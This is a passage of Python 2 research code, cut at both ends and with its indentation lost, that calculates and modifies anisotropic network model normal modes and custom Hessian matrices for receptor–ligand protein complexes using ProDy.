# print "reference, counterpart, proteinComplex, chain_complex (calphas, calphas*3-6) : ", (reference.select('calpha').numAtoms(), reference.select('calpha').numAtoms()*3 -6), (counterpart.select('calpha').numAtoms(), counterpart.select('calpha').numAtoms()*3-6), (proteinComplex.select('calpha').numAtoms(), proteinComplex.select('calpha').numAtoms()*3-6), (chain_complex.select('calpha').numAtoms(), chain_complex.select('calpha').numAtoms()*3 -6)
# print "anm_reference, anm_counterpart, anm_complex hessian shapes : ", anm_reference[0].getHessian().shape, anm_counterpart[0].getHessian().shape, anm_complex[0].getHessian().shape
# print "anm_reference, anm_counterpart, anm_complex, anm_complex_slc getArray() shapes : ", anm_reference[0].getArray().shape, anm_counterpart[0].getArray().shape, anm_complex[0].getArray().shape, anm_complex_slc[0].getArray().shape
self._anm_reference, self._anm_reference_slc = self._calcANMsUnified(reference, ref_chain, numberOfModes/2, selstr, whatAtomsToMatch)
self._anm_counterpart, self._anm_counterpart_slc = self._calcANMsUnified(counterpart, counterpart_chain, numberOfModes/2, selstr, whatAtomsToMatch)
# print "15 ang contact before moving atoms:", proteinComplex.select('same residue as exwithin 15 of segment "L." ').numAtoms()
# self._moveSegment(proteinComplex, "L", 30)
# if proteinComplex.select('same residue as exwithin 15 of segment "L." ') != None:
# print "15 ang contact after moving atoms: ", proteinComplex.select('same residue as exwithin 15 of segment "L." ').numAtoms()
# else:
# print "15 ang contact after moving atoms: 0"
self._anm_complex, self._anm_complex_slc = self._calcANMsUnified(proteinComplex, chain_complex, numberOfModes, selstr, whatAtomsToMatch)
#self.utils.testHessianSubMatrices(self._anm_reference, self._anm_counterpart, self._anm_complex)
# check blockmatrix differences and pymol output
# useRelError = True
#significantDifferences = self.utils.testBlockMatrixMembership(self._anm_reference[0].getHessian(), self._anm_counterpart[0].getHessian(), self._anm_complex[0].getHessian(), useRelativeError=useRelError)
#self.utils.whichPatternsAreAffectedbySignificantDifferences(significantDifferences)
# assert reference.getResnums()[0] == proteinComplex.getResnums()[0]
#print self.utils.significantDifferencesToPymolResiduesString(significantDifferences, reference.getResnums()[0])
print "anm_reference_slc, anm_counterpart_slc, anm_complex_slc getArray() shapes : ", self._anm_reference_slc[0].getArray().shape, self._anm_counterpart_slc[0].getArray().shape, self._anm_complex_slc[0].getArray().shape
def calcANMsUnified(self, reference, counterpart, proteinComplex, numberOfModes, encounter, ref_chain = None, counterpart_chain = None, chain_complex = None, selstr='calpha', whatAtomsToMatch='calpha',):
""" Calculate the ANMs for the NMA. If examinations on the complex, it is assumed (for now) that the reference protein is the receptor. """
if (ref_chain == None) and (counterpart_chain == None) and (chain_complex == None):
self.bound_provided = False
else:
self.bound_provided = True
if self.utils.config.investigationsOn == "Individual" or self.utils.config.investigationsOn == "Complex" :
assert self.utils.config.whichCustomHIndividual == "HC_subvector" or self.utils.config.whichCustomHIndividual == "submatrix" or self.utils.config.whichCustomHIndividual == "canonical"
numberOfModesComplex = min((proteinComplex.select('calpha').numAtoms()*3 - 6), self.utils.config.maxModesToCalculate)
if ref_chain != None:
self._anm_reference, self._anm_reference_slc = self._calcANMsUnified(reference, numberOfModes, selstr, whatAtomsToMatch, ref_chain)
else:
self._anm_reference, self._anm_reference_slc = self._calcANMsUnified(reference, numberOfModes, selstr, whatAtomsToMatch)
self._anm_counterpart = calcANM(counterpart, n_modes = numberOfModes, selstr = selstr, zeros = True)
if chain_complex != None:
self._anm_complex, self._anm_complex_slc = self._calcANMsUnified(proteinComplex, numberOfModesComplex, selstr, whatAtomsToMatch, chain_complex)
else:
self._anm_complex, self._anm_complex_slc = self._calcANMsUnified(proteinComplex, numberOfModesComplex, selstr, whatAtomsToMatch)
# elif self.utils.config.investigationsOn == "Complex":
# numberOfModesComplex = numberOfModes*2
# self._anm_reference, self._anm_reference_slc = self._calcANMsUnified(reference, numberOfModes, selstr, whatAtomsToMatch, ref_chain)
# self._anm_counterpart, self._anm_counterpart_slc = self._calcANMsUnified(counterpart, numberOfModes, selstr, whatAtomsToMatch, counterpart_chain)
# self._anm_complex, self._anm_complex_slc = self._calcANMsUnified(proteinComplex, numberOfModesComplex, selstr, whatAtomsToMatch, chain_complex)
print "anm_reference anm_counterpart, anm_complex getArray() shapes : ", self._anm_reference[0].getArray().shape, self._anm_counterpart[0].getArray().shape, self._anm_complex[0].getArray().shape
print "anm_reference_slc, anm_complex_slc getArray() shapes : ", self._anm_reference_slc[0].getArray().shape, self._anm_complex_slc[0].getArray().shape
# create custom H via U1
if self.utils.config.customH:
HC = self._anm_complex[0].getHessian()
if self.utils.isReceptor(reference.getTitle()):
HR = self._anm_reference[0].getHessian()
HL = self._anm_counterpart[0].getHessian()
else:
HR = self._anm_counterpart[0].getHessian()
HL = self._anm_reference[0].getHessian()
HRtilde = HC[:HR.shape[0], :HR.shape[1]]
HLtilde = HC[HR.shape[0]:HR.shape[0]+HL.shape[0], HR.shape[1]:HR.shape[1]+HL.shape[1]]
assert HR.shape == HRtilde.shape
assert HL.shape == HLtilde.shape
# for now assert that reference is always the receptor
if self.utils.config.investigationsOn == "Complex":
assert self.utils.isReceptor(reference.getTitle())
HCcustomBuild = np.zeros((HC.shape[0], HC.shape[1]))
if self.utils.isReceptor(reference.getTitle()):
if self.utils.config.whichCustomHC == "HC_U1" or self.utils.config.whichCustomHC == "HC_U1_1k1k":
HRtildeH_ANew, interCalphaIndicesHR = self.calcCustomH_ANew(HR.copy(), encounter.getReference(), encounter.getUnboundCounterpart(), encounter, "C_u", "r_ij", True, selstr)
HLtildeH_ANew, interCalphaIndicesHL = self.calcCustomH_ANew(HL.copy(), encounter.getUnboundCounterpart(), encounter.getReference(), encounter, "C_u", "r_ij", False, selstr)
HRL_new = self.calcCustomH_ANew_IJ(encounter.getReference(), encounter.getUnboundCounterpart(), encounter, False, "r_ij", True, selstr)
elif self.utils.config.whichCustomHC == "HC_0" or self.utils.config.whichCustomHC == "HC_06":
HRtildeH_ANew = HR.copy()
HLtildeH_ANew = HL.copy()
HRL_new = np.zeros(((reference.select('calpha').numAtoms()*3), (counterpart.select('calpha').numAtoms()*3) ))
interCalphaIndicesHR = None
interCalphaIndicesHL = None
print "reference is receptor, shapes of HRtilde, HLtilde, HRL: ", HRtildeH_ANew.shape, HLtildeH_ANew.shape, HRL_new.shape
else:
if self.utils.config.whichCustomHC == "HC_U1":
HRtildeH_ANew, interCalphaIndicesHR = self.calcCustomH_ANew(HR.copy(), encounter.getUnboundCounterpart(), encounter.getReference(), encounter, "C_u", "r_ij", False, selstr)
HLtildeH_ANew, interCalphaIndicesHL = self.calcCustomH_ANew(HL.copy(), encounter.getReference(), encounter.getUnboundCounterpart(), encounter, "C_u", "r_ij", True, selstr)
HRL_new = self.calcCustomH_ANew_IJ(encounter.getUnboundCounterpart(), encounter.getReference(), encounter, False, "r_ij", False, selstr)
print "reference is ligand, shapes of HLtilde, HRtilde, HRL: ", HLtildeH_ANew.shape, HRtildeH_ANew.shape, HRL_new.shape
# put the new HRtilde and HLtilde inside HC
HCcustomBuild[:HR.shape[0], :HR.shape[1]] = HRtildeH_ANew
HCcustomBuild[HR.shape[0]:HR.shape[0]+HL.shape[0], HR.shape[1]:HR.shape[1]+HL.shape[1]] = HLtildeH_ANew
HCcustomBuild[0:HR.shape[0], HR.shape[1]:HR.shape[1]+HL.shape[1]] = HRL_new
HCcustomBuild[HR.shape[0]:HR.shape[0]+HL.shape[0], 0:HR.shape[1]] = HRL_new.T
# optional assertion to test if HCcustomBuild equals the original HC if k = 1 and d = 15 (default ProDy settings)
if (self.utils.config.whichCustomHC == "HC_U1" and self.utils.config.customHRdistance == 15 and self.utils.config.customForceConstant == 1.0):
# assert np.allclose(HC, HCcustomBuild) # assert this if k = 1, A = 15
print "not asserting HCcustomBuild equals original HC with k1 A15"
# Projection
# def projectHessian(self, hessian, reference, proteinComplex, referenceSegment, projectionStyle, projectOnlyReferencePartOfHC=False, interCalphaIndices=None):
if self.utils.config.projectHessian:
if self.utils.config.investigationsOn == "Individual" or self.utils.config.investigationsOn == "Complex":
if self.utils.isReceptor(reference.getTitle()):
if self.utils.config.whichCustomHC == "HC_U1":
if self.utils.config.projectionStyle == "full" or self.utils.config.projectionStyle == "intra":
if self.utils.config.whichCustomHIndividual == "HC_subvector":
HCcustomBuild = self.projectHessian(HCcustomBuild.copy(), reference, proteinComplex, "R", self.utils.config.projectionStyle, True, interCalphaIndicesHR)
#HCcustomBuild = self.projectHessian(HCcustomBuild.copy(), proteinComplex, proteinComplex, '', self.utils.config.projectionStyle, False, interCalphaIndicesHR)
elif self.utils.config.whichCustomHIndividual == "submatrix":
HRtildeH_ANew = self.projectHessian(HRtildeH_ANew.copy(), reference, proteinComplex, "R", self.utils.config.projectionStyle, False, interCalphaIndicesHR)
elif self.utils.config.projectionStyle == "fixedDomainFrame":
HCcustomBuild = self.transformHessianToFixedDomainFrame(HCcustomBuild.copy(), reference, proteinComplex, "R", self.utils.config.projectionStyle)
# else reference is the ligand
else:
if self.utils.config.whichCustomHC == "HC_U1":
if self.utils.config.projectionStyle == "full" or self.utils.config.projectionStyle == "intra":
if self.utils.config.whichCustomHIndividual == "HC_subvector":
HCcustomBuild = self.projectHessian(HCcustomBuild.copy(), reference, proteinComplex, "L", self.utils.config.projectionStyle, True, interCalphaIndicesHL)
#HCcustomBuild = self.projectHessian(HCcustomBuild.copy(), proteinComplex, proteinComplex, '', self.utils.config.projectionStyle, False, interCalphaIndicesHL)
elif self.utils.config.whichCustomHIndividual == "submatrix":
HLtildeH_ANew = self.projectHessian(HLtildeH_ANew.copy(), reference, proteinComplex, "L", self.utils.config.projectionStyle, False, interCalphaIndicesHL)
elif self.utils.config.projectionStyle == "fixedDomainFrame":
HCcustomBuild = self.transformHessianToFixedDomainFrame(HCcustomBuild.copy(), reference, proteinComplex, "L", self.utils.config.projectionStyle)
elif self.utils.config.investigationsOn == "Complex":
# project out the rigid body motions of the receptor. if the goal is to project the whole complex, do: HCcustomBuild = self.projectHessian(HCcustomBuild, proteinComplex, proteinComplex, '')
if self.utils.config.projectionStyle == "full" or self.utils.config.projectionStyle == "intra":
HCcustomBuild = self.projectHessian(HCcustomBuild.copy(), reference, proteinComplex, "R", self.utils.config.projectionStyle, True, interCalphaIndicesHR)
elif self.utils.config.projectionStyle == "fullComplex":
HCcustomBuild = self.projectHessian(HCcustomBuild.copy(), proteinComplex, proteinComplex, '', self.utils.config.projectionStyle)
elif self.utils.config.projectionStyle == "fixedDomainFrame":
HCcustomBuild = self.transformHessianToFixedDomainFrame(HCcustomBuild.copy(), reference, proteinComplex, "R", self.utils.config.projectionStyle)
else:
raise Exception('unknown projection style')
if self.utils.config.investigationsOn == "Complex" or self.utils.config.whichCustomHIndividual == "HC_subvector":
# Create the custom complex ANM
self._anm_complex_tilde = ANM(self._anm_complex[0].getTitle()+"_"+self.utils.config.whichCustomHC)
self._anm_complex_tilde.setHessian(HCcustomBuild)
if self.utils.config.calculateZeroEigvalModes:
if self.utils.config.whichCustomHC == "HC_0" or self.utils.config.whichCustomHC == "HC_06":
numberOfModesComplex += 6
self._anm_complex_tilde.calcModes(n_modes=numberOfModesComplex, zeros=True)
else:
self._anm_complex_tilde.calcModes(n_modes=numberOfModesComplex)
# Extend the self._anm_reference_tilde on all atoms
anm_complex_tilde_extend = extendModel(self._anm_complex_tilde, self._anm_complex[1], proteinComplex, norm=True)
# Then slice the anm_complex to the matched atoms
self._anm_complex_tilde_slc = sliceModel(anm_complex_tilde_extend[0], anm_complex_tilde_extend[1], selstr)
# Normalize the modes of the sliced anm
self._anm_complex_tilde_slc = self.getNormalizedANM(self._anm_complex_tilde_slc)
# Replace the complex anm and the complex_slc anm with the modified ANMs
print "Replacing ANM H with ANM Htilde for the complex"
self._anm_complex = (self._anm_complex_tilde, self._anm_complex[1])
self._anm_complex_slc = self._anm_complex_tilde_slc
# modify HR to have the sliced part of HC_tilde
if self.utils.config.investigationsOn == "Individual" or self.utils.config.investigationsOn == "Complex":
if self.utils.config.whichCustomHIndividual == "HC_subvector":
Marray = self.utils.sliceComplexModestoMatchProtein(self._anm_complex[0].getArray(), reference, encounter.getReferenceSegment())
self._anm_reference_tilde = ANM(self._anm_reference[0].getTitle()+"_"+self.utils.config.whichCustomHC)
self._anm_reference_tilde.setEigens(Marray, self._anm_complex[0].getEigvals())
self._anm_reference_tilde = (self._anm_reference_tilde, self._anm_reference[1])
self._anm_reference_tilde = self.getNormalizedANM(self._anm_reference_tilde)
# submatrix, take the new HRtilde/HLtilde, re-calculate its modes and replace the previous ANM
elif self.utils.config.whichCustomHIndividual == "submatrix":
if self.utils.isReceptor(reference.getTitle()):
submatrix = HRtildeH_ANew
else:
submatrix = HLtildeH_ANew
self._anm_reference_tilde = ANM(self._anm_reference[0].getTitle()+"_"+self.utils.config.whichCustomHC)
self._anm_reference_tilde.setHessian(submatrix)
if self.utils.config.calculateZeroEigvalModes:
self._anm_reference_tilde.calcModes(n_modes=numberOfModes, zeros=True)
else:
self._anm_reference_tilde.calcModes(n_modes=numberOfModes)
self._anm_reference_tilde = (self._anm_reference_tilde, self._anm_reference[1])
# Extend the self._anm_reference_tilde on all atoms
anm_reference_tilde_extend = extendModel(self._anm_reference_tilde[0], self._anm_reference[1], reference, norm=True)
# Then slice the anm_reference to the matched
self._anm_reference_tilde_slc = sliceModel(anm_reference_tilde_extend[0], anm_reference_tilde_extend[1], selstr)
self._anm_reference_tilde_slc = self.getNormalizedANM(self._anm_reference_tilde_slc)
# Replace reference and reference_slc with the modified ANMs
print "Replacing ANM H with ANM Htilde for the reference"
self._anm_reference = self._anm_reference_tilde
self._anm_reference_slc = self._anm_reference_tilde_slc
def calcANMsForPart2b2k(self, reference, counterpart, proteinComplex, ref_chain, counterpart_chain, chain_complex, numberOfModes, encounter, selstr='calpha', whatAtomsToMatch='calpha'):
""" Unbound complex to bound complex NMA, it is assumed that the reference is the receptor and is the first object in the complex pdb file
This method creates self.* NMA objects
Args:
reference: the receptor protein
counterpart: the ligand protein
proteinComplex: the protein complex
ref_chain: the matched part of the reference
counterpart_chain: the matched part of the counterpart
chain_complex: the matched part on the complex
numberOfModes: the 2k number of modes
encounter: object aggregating proteins
selstr: the selection string for the NMA, course grained is calpha
"""
# Create the anm of reference, counterpart and proteinComplex)
self._anm_reference, self._anm_reference_slc = self._calcANMsUnified(reference, ref_chain, numberOfModes/2, selstr, whatAtomsToMatch)
self._anm_counterpart, self._anm_counterpart_slc = self._calcANMsUnified(counterpart, counterpart_chain, numberOfModes/2, selstr, whatAtomsToMatch)
self._anm_complex, self._anm_complex_slc = self._calcANMsUnified(proteinComplex, chain_complex, numberOfModes, selstr, whatAtomsToMatch)
print "anm_reference anm_counterpart, anm_complex getArray() shapes : ", self._anm_reference[0].getArray().shape, self._anm_counterpart[0].getArray().shape, self._anm_complex[0].getArray().shape
print "anm_reference_slc, anm_counterpart_slc, anm_complex_slc getArray() shapes : ", self._anm_reference_slc[0].getArray().shape, self._anm_counterpart_slc[0].getArray().shape, self._anm_complex_slc[0].getArray().shape
# modify the hessians
if self.utils.config.customH:
HC = self._anm_complex[0].getHessian()
if self.utils.isReceptor(reference.getTitle()):
HR = self._anm_reference[0].getHessian()
HL = self._anm_counterpart[0].getHessian()
else:
HR = self._anm_counterpart[0].getHessian()
HL = self._anm_reference[0].getHessian()
HRtilde = HC[:HR.shape[0], :HR.shape[1]]
HLtilde = HC[HR.shape[0]:HR.shape[0]+HL.shape[0], HR.shape[1]:HR.shape[1]+HL.shape[1]]
assert HR.shape == HRtilde.shape
assert HL.shape == HLtilde.shape
# for now assert that reference is always the receptor, in case of complex investigation
assert self.utils.isReceptor(reference.getTitle())
HCcustomBuild = np.zeros((HC.shape[0], HC.shape[1]))
if self.utils.config.whichCustomHC == "HC_U1":
# create the complex hessian with interactions on the off diagonal using U1
print "HC_U1"
HRtildeH_ANew = self.calcCustomH_ANew(HR.copy(), encounter.getReference(), encounter.getUnboundCounterpart(), encounter, "C_u", "r_ij", True, selstr)
HLtildeH_ANew = self.calcCustomH_ANew(HL.copy(), encounter.getUnboundCounterpart(), encounter.getReference(), encounter, "C_u", "r_ij", False, selstr)
HRL_new = self.calcCustomH_ANew_IJ(encounter.getReference(), encounter.getUnboundCounterpart(), encounter, False, "r_ij", True, selstr)
elif self.utils.config.whichCustomHC == "HC_0" or self.utils.config.whichCustomHC == "HC_06":
# create the hessian by just using canonical HR and HL and offmatrices zero
print "HC_0 or HC_06"
HRtildeH_ANew = HR.copy()
HLtildeH_ANew = HL.copy()
HRL_new = np.zeros(((reference.select('calpha').numAtoms()*3), (counterpart.select('calpha').numAtoms()*3) ))
print "reference is receptor, shapes of HRtilde, HLtilde, HRL: ", HRtildeH_ANew.shape, HLtildeH_ANew.shape, HRL_new.shape
print "finished projecting H, anm_reference_tilde calc modes"
# put the new HRtilde and HLtilde inside HC
HCcustomBuild[:HR.shape[0], :HR.shape[1]] = HRtildeH_ANew
HCcustomBuild[HR.shape[0]:HR.shape[0]+HL.shape[0], HR.shape[1]:HR.shape[1]+HL.shape[1]] = HLtildeH_ANew
HCcustomBuild[0:HR.shape[0], HR.shape[1]:HR.shape[1]+HL.shape[1]] = HRL_new
HCcustomBuild[HR.shape[0]:HR.shape[0]+HL.shape[0], 0:HR.shape[1]] = HRL_new.T
#if self.utils.config.whichCustomHC == "HC_U1":
# assert np.allclose(HC, HCcustomBuild) # assert this if k = 1, A = 15
# print "asserted HC with k1 A 15"
if self.utils.config.projectHessian:
HCcustomBuild = self.projectHessian(HCcustomBuild, proteinComplex, proteinComplex, '')
# make HC anm
self._anm_complex_tilde = ANM(self._anm_complex[0].getTitle()+"_"+self.utils.config.whichCustomHC)
self._anm_complex_tilde.setHessian(HCcustomBuild)
self._anm_complex_tilde.calcModes(n_modes=numberOfModes)
# Extend the self._anm_reference_tilde on all atoms
anm_complex_tilde_extend = extendModel(self._anm_complex_tilde, self._anm_complex[1], proteinComplex, norm=True)
# Then slice the anm_complex to the matched atoms
self._anm_complex_tilde_slc = sliceModel(anm_complex_tilde_extend[0], anm_complex_tilde_extend[1], chain_complex.getSelstr())
# Replace the complex anm and the complex_slc anm with the modified ANMs
print "Replacing ANM H with ANM Htilde for the complex"
self._anm_complex = (self._anm_complex_tilde, self._anm_complex[1])
self._anm_complex_slc = self._anm_complex_tilde_slc
def calcANMsForPart2b(self, reference, counterpart, proteinComplex, ref_chain, counterpart_chain, chain_complex, numberOfModes, encounter, selstr='calpha', whatAtomsToMatch='calpha'):
""" Create the ANMs of the reference, counterpart and complex objects. If set in config, project the hessian matrix of the reference
to ensure 6 zero eigenvalue modes, see formula 8.27 from the book "A practical introduction to the simulation of molecular dynamics", Field. """
self._anm_reference, self._anm_reference_slc = self._calcANMsUnified(reference, ref_chain, numberOfModes, selstr, whatAtomsToMatch)
self._anm_counterpart = calcANM(counterpart, selstr=selstr)
# self._moveSegment(proteinComplex, "L", 50)
numberOfModesComplex = min((proteinComplex.select('calpha').numAtoms()*3 - 6), self.utils.config.maxModesToCalculate)
self._anm_complex, self._anm_complex_slc = self._calcANMsUnified(proteinComplex, chain_complex, numberOfModesComplex, selstr, whatAtomsToMatch)
# project hessian matrix
if self.utils.config.projectHessian:
HC = self._anm_complex[0].getHessian()
if self.utils.isReceptor(reference.getTitle()):
HR = self._anm_reference[0].getHessian()
HL = self._anm_counterpart[0].getHessian()
else:
HR = self._anm_counterpart[0].getHessian()
HL = self._anm_reference[0].getHessian()
HRtilde = HC[:HR.shape[0], :HR.shape[1]]
HLtilde = HC[HR.shape[0]:HR.shape[0]+HL.shape[0], HR.shape[1]:HR.shape[1]+HL.shape[1]]
assert HR.shape == HRtilde.shape
assert HL.shape == HLtilde.shape
##
#writeArray("HRtildefromHC.txt", HRtilde, format='%f')
#writeArray("HLtildefromHC.txt", HLtilde, format='%f')
##
# Create the tilde ANM
self._anm_reference_tilde = ANM(self._anm_reference[0].getTitle()+"_tilde")
# Here the PH'P treatment for the hessian matrix from the normal modes book by Field
if self.utils.isReceptor(reference.getTitle()):
if self.utils.config.modifyHDelta:
print "modifying HR with deltaHR"
HRtilde = self.addscaledHdelta(HR, HRtilde, self.utils.config.deltamultiplicatorForH)
# if using terms with true bound structure second derivation parts r_{ij}-r_{ij}^{2}
if self.utils.config.customHR_A:
#writeArray("originalHR.txt", self._anm_reference[0].getHessian(), format='%f')
HRtilde = self.calcCustomH_A_NeighborsBound(self._anm_reference[0].getHessian(), encounter, selstr)
#writeArray("customHRtilde.txt", HRtilde, format='%f')
print "reference is receptor, shape of HRtilde: ", HRtilde.shape
HRtilde = self.projectHessian(HRtilde, reference, proteinComplex, encounter.getReferenceSegment())
self._anm_reference_tilde.setHessian(HRtilde)
else:
if self.utils.config.modifyHDelta:
print "modifying HL with deltaHL"
HLtilde = self.addscaledHdelta(HL, HLtilde, self.utils.config.deltamultiplicatorForH)
# if using terms with true bound structure second derivation parts r_{ij}-r_{ij}^{2}
if self.utils.config.customHR_A:
#writeArray("originalHL.txt", self._anm_reference[0].getHessian(), format='%f')
HLtilde = self.calcCustomH_A_NeighborsBound(self._anm_reference[0].getHessian(), encounter, selstr)
#writeArray("customHLtilde.txt", HLtilde, format='%f')
print "reference is ligand, shape of HLtilde: ", HLtilde.shape
HLtilde = self.projectHessian(HLtilde, reference, proteinComplex, encounter.getReferenceSegment())
self._anm_reference_tilde.setHessian(HLtilde)
print "finished projecting H, anm_reference_tilde calc modes"
# testing of projected eigenvals
self._anm_reference_tilde.calcModes(n_modes=numberOfModes)
#print "HR eigenvals: ", self._anm_reference[0].getEigvals()[0:10]
#print "HRtilde eigenvals: ", self._anm_reference_tilde.getEigvals()[0:10]
# Extend the self._anm_reference_tilde on all atoms
anm_reference_tilde_extend = extendModel(self._anm_reference_tilde, self._anm_reference[1], reference, norm=True)
# Then slice the anm_reference to the matched
self._anm_reference_tilde_slc = sliceModel(anm_reference_tilde_extend[0], anm_reference_tilde_extend[1], ref_chain.getSelstr())
# Replace reference and reference_slc with the modified ANMs
print "Replacing ANM H with ANM Htilde for the reference"
self._anm_reference = (self._anm_reference_tilde, self._anm_reference[1])
self._anm_reference_slc = self._anm_reference_tilde_slc
if self.utils.config.HR1kHRtilde1k:
self._anm_reference_original, self._anm_reference_slc_original = self._calcANMsUnified(reference, ref_chain, numberOfModes, selstr, whatAtomsToMatch)
def calcANMsForPart2bIndividualProtein_U1(self, reference, counterpart, proteinComplex, ref_chain, counterpart_chain, chain_complex, numberOfModes, encounter, selstr='calpha', whatAtomsToMatch='calpha'):
""" Create the ANMs of the reference, counterpart and complex objects. If set in config, project the hessian matrix of the reference
to ensure 6 zero eigenvalue modes, see formula 8.27 from the book "A practical introduction to the simulation of molecular dynamics", Field. """
self._anm_reference, self._anm_reference_slc = self._calcANMsUnified(reference, ref_chain, numberOfModes, selstr, whatAtomsToMatch)
self._anm_counterpart = calcANM(counterpart, selstr=selstr)
# self._moveSegment(proteinComplex, "L", 50)
numberOfModesComplex = min((proteinComplex.select('calpha').numAtoms()*3 - 6), self.utils.config.maxModesToCalculate)
self._anm_complex, self._anm_complex_slc = self._calcANMsUnified(proteinComplex, chain_complex, numberOfModesComplex, selstr, whatAtomsToMatch)
###
print "anm_reference anm_counterpart, anm_complex getArray() shapes : ", self._anm_reference[0].getArray().shape, self._anm_counterpart[0].getArray().shape, self._anm_complex[0].getArray().shape
print "anm_reference_slc, anm_complex_slc getArray() shapes : ", self._anm_reference_slc[0].getArray().shape, self._anm_complex_slc[0].getArray().shape
# create custom H via U1
if self.utils.config.customH:
HC = self._anm_complex[0].getHessian()
if self.utils.isReceptor(reference.getTitle()):
HR = self._anm_reference[0].getHessian()
HL = self._anm_counterpart[0].getHessian()
else:
HR = self._anm_counterpart[0].getHessian()
HL = self._anm_reference[0].getHessian()
HRtilde = HC[:HR.shape[0], :HR.shape[1]]
HLtilde = HC[HR.shape[0]:HR.shape[0]+HL.shape[0], HR.shape[1]:HR.shape[1]+HL.shape[1]]
assert HR.shape == HRtilde.shape
assert HL.shape == HLtilde.shape
# for now assert that reference is always the receptor
HCcustomBuild = np.zeros((HC.shape[0], HC.shape[1]))
if self.utils.isReceptor(reference.getTitle()):
if self.utils.config.customHR_A:
#HR, referenceStructure, neighborStructure, encounter, neighborhoodFrom, equilibriumAt, workOnReceptor=True, selstr='calpha'
HRtildeH_ANew = self.calcCustomH_ANew(HR.copy(), encounter.getReference(), encounter.getUnboundCounterpart(), encounter, "C_u", "r_ij", True, selstr)
HLtildeH_ANew = self.calcCustomH_ANew(HL.copy(), encounter.getUnboundCounterpart(), encounter.getReference(), encounter, "C_u", "r_ij", False, selstr)
HRL_new = self.calcCustomH_ANew_IJ(encounter.getReference(), encounter.getUnboundCounterpart(), encounter, False, "r_ij", True, selstr)
print "reference is receptor, shapes of HRtilde, HLtilde, HRL: ", HRtildeH_ANew.shape, HLtildeH_ANew.shape, HRL_new.shape
else:
if self.utils.config.customHR_A:
HRtildeH_ANew = self.calcCustomH_ANew(HR.copy(), encounter.getUnboundCounterpart(), encounter.getReference(), encounter, "C_u", "r_ij", False, selstr)
HLtildeH_ANew = self.calcCustomH_ANew(HL.copy(), encounter.getReference(), encounter.getUnboundCounterpart(), encounter, "C_u", "r_ij", True, selstr)
HRL_new = self.calcCustomH_ANew_IJ(encounter.getUnboundCounterpart(), encounter.getReference(), encounter, False, "r_ij", False, selstr)
print "reference is ligand, shapes of HLtilde, HRtilde, HRL: ", HLtildeH_ANew.shape, HRtildeH_ANew.shape, HRL_new.shape
print "finished projecting H, anm_reference_tilde calc modes"
# put the new HRtilde and HLtilde inside HC
HCcustomBuild[:HR.shape[0], :HR.shape[1]] = HRtildeH_ANew
HCcustomBuild[HR.shape[0]:HR.shape[0]+HL.shape[0], HR.shape[1]:HR.shape[1]+HL.shape[1]] = HLtildeH_ANew
HCcustomBuild[0:HR.shape[0], HR.shape[1]:HR.shape[1]+HL.shape[1]] = HRL_new
HCcustomBuild[HR.shape[0]:HR.shape[0]+HL.shape[0], 0:HR.shape[1]] = HRL_new.T
#assert np.allclose(HC, HCcustomBuild)
#sys.exit()
# Project the reference part in the HCcustomBuild matrix
if self.utils.isReceptor(reference.getTitle()):
if self.utils.config.customHR_A:
HCcustomBuildprojected = self.projectHessian(HCcustomBuild.copy(), reference, proteinComplex, "R", True)
else:
if self.utils.config.customHR_A:
HCcustomBuildprojected = self.projectHessian(HCcustomBuild.copy(), reference, proteinComplex, "L", True)
# Create the custom complex ANM
self._anm_complex_tilde = ANM(self._anm_complex[0].getTitle()+"_tilde")
self._anm_complex_tilde.setHessian(HCcustomBuildprojected)
if self.utils.config.enforceAllModesAfterProjection:
self._anm_complex_tilde.calcModes(n_modes=numberOfModes, zeros=True)
else:
self._anm_complex_tilde.calcModes(n_modes=numberOfModes)
# Extend the self._anm_reference_tilde on all atoms
anm_complex_tilde_extend = extendModel(self._anm_complex_tilde, self._anm_complex[1], proteinComplex, norm=True)
# Then slice the anm_complex to the matched atoms
self._anm_complex_tilde_slc = sliceModel(anm_complex_tilde_extend[0], anm_complex_tilde_extend[1], chain_complex.getSelstr())
# Replace the complex anm and the complex_slc anm with the modified ANMs
print "Replacing ANM H with ANM Htilde for the complex"
self._anm_complex = (self._anm_complex_tilde, self._anm_complex[1])
self._anm_complex_slc = self._anm_complex_tilde_slc
# Create custom anm for reference
if self.utils.config.enforceAllModesAfterProjection:
Marray = self.utils.sliceComplexModestoMatchProtein(self._anm_complex[0].getArray()[:,6:], reference, encounter.getReferenceSegment())
self._anm_reference_tilde = ANM(self._anm_reference[0].getTitle()+"_tilde")
self._anm_reference_tilde.setEigens(Marray, self._anm_complex[0].getEigvals()[6:])
else:
Marray = self.utils.sliceComplexModestoMatchProtein(self._anm_complex[0].getArray(), reference, encounter.getReferenceSegment())
self._anm_reference_tilde = ANM(self._anm_reference[0].getTitle()+"_tilde")
self._anm_reference_tilde.setEigens(Marray, self._anm_complex[0].getEigvals())
# Extend the self._anm_reference_tilde on all atoms
anm_reference_tilde_extend = extendModel(self._anm_reference_tilde, self._anm_reference[1], reference, norm=True)
# Then slice the anm_reference to the matched
self._anm_reference_tilde_slc = sliceModel(anm_reference_tilde_extend[0], anm_reference_tilde_extend[1], ref_chain.getSelstr())
#
# try modes comparison
# ranges = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 20, 30, 40, 50, 60, 70]
#
# try:
# subspaceOverlaps = []
# for val in ranges:
# subspaceOverlaps.append(calcSubspaceOverlap(self._anm_reference[0][0:val], self._anm_reference_tilde[0:val]))
# encounter.storeSubSpaceOverlaps(subspaceOverlaps, ranges)
# except Exception:
# sys.exc_clear()
#
# try:
# MarrayNormed = self.utils.normalized(Marray.copy(), axis=0)
# anm_reference_tilde_normed = ANM(self._anm_reference[0].getTitle()+"_tildenormed")
# anm_reference_tilde_normed.setEigens(MarrayNormed, self._anm_complex[0].getEigvals())
# covarianceOverlaps = []
# for val in ranges:
# covarianceOverlaps.append(calcCovOverlap(self._anm_reference[0][0:val], anm_reference_tilde_normed[0:val]))
# encounter.storeCovarianceOverlap(covarianceOverlaps, ranges)
# except Exception, err:
# #sys.exc_clear()
# print "Exception covarianceoverlap occurred: ", err
# print traceback.format_exc()
#
# try:
# overlapTable = getOverlapTable(self._anm_reference[0], self._anm_reference_tilde)
# encounter.storeOverlapTable(overlapTable)
# except Exception:
# sys.exc_clear()
#
# Replace reference and reference_slc with the modified ANMs
print "Replacing ANM H with ANM Htilde for the reference"
self._anm_reference = (self._anm_reference_tilde, self._anm_reference[1])
self._anm_reference_slc = self._anm_reference_tilde_slc
def _calcANMsUnified(self, reference, numberOfModes, selstr='calpha', whatAtomsToMatch='calpha', direct_call = None, ref_chain = None):
# Create the anm of the reference
